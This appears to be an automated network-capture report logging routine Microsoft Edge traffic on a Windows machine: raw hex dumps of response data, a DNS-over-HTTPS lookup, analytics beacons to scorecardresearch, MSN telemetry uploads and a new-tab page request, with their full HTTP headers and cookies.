                                                                                                                                                                                                                                                                          Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                          Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                          Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                          Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                          Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                          Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                          Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                          Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          7192.168.2.849838162.159.61.34435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:43 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ed36e82cefa1-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          8192.168.2.8498753.171.139.324435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:46 UTC925OUTGET /b?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          2025-01-09 13:55:46 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:46 GMT
                                                                                                                                                                                                                                                                          Location: /b2?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                          set-cookie: UID=1BB0012d778c190819b9e701736430946; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                          set-cookie: XID=1BB0012d778c190819b9e701736430946; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                          Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                          Via: 1.1 d0868637a3730c2afc20b3628b047a9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: JFK52-P8
                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: qSVBeNqpeizYR-jC6RaTsVqR8wjeUnpub3w4WsvTj1zksJLPn0xalw==


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          9192.168.2.84987413.89.178.274435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:46 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430943703&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 3857
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1
                                                                                                                                                                                                                                                                          2025-01-09 13:55:46 UTC3857OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 35 35 3a 34 33 2e 36 39 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 66 39 38 66 61 31 63 2d 33 31 38 34 2d 34 61 62 64 2d 39 37 31 62 2d 30 62 61 32 34 36 35 33 37 62 66 37 22 2c 22 65 70 6f 63 68 22 3a 22 31 35 30 32 36 33 38 31 30 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-09T13:55:43.698Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"5f98fa1c-3184-4abd-971b-0ba246537bf7","epoch":"1502638108"},"app":{"locale
                                                                                                                                                                                                                                                                          2025-01-09 13:55:46 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=b209fb4490a14b5f851bfcc800941766&HASH=b209&LV=202501&V=4&LU=1736430946358; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:55:46 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          Set-Cookie: MS0=16076c41d4374a069e5be29d6239e265; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:25:46 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          time-delta-millis: 2655
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:45 GMT
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          10192.168.2.8498943.171.139.324435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC1012OUTGET /b2?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: UID=1BB0012d778c190819b9e701736430946; XID=1BB0012d778c190819b9e701736430946
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:47 GMT
                                                                                                                                                                                                                                                                          Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                          Via: 1.1 40185075b4d4551b3f16d587d961063c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: JFK52-P8
                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: jesQiLpFKJYUs--5PZbcx1NJBawsJvD_rpjeaJ9qsAgSmTgadfyL0g==


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          11192.168.2.849895131.253.33.2034435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC2137OUTGET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ntp.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-viewport-height: 876
                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                          sec-ch-viewport-width: 1232
                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                          downlink: 7.1
                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          device-memory: 8
                                                                                                                                                                                                                                                                          rtt: 250
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.2045.47"
                                                                                                                                                                                                                                                                          sec-ch-dpr: 1
                                                                                                                                                                                                                                                                          ect: 4g
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
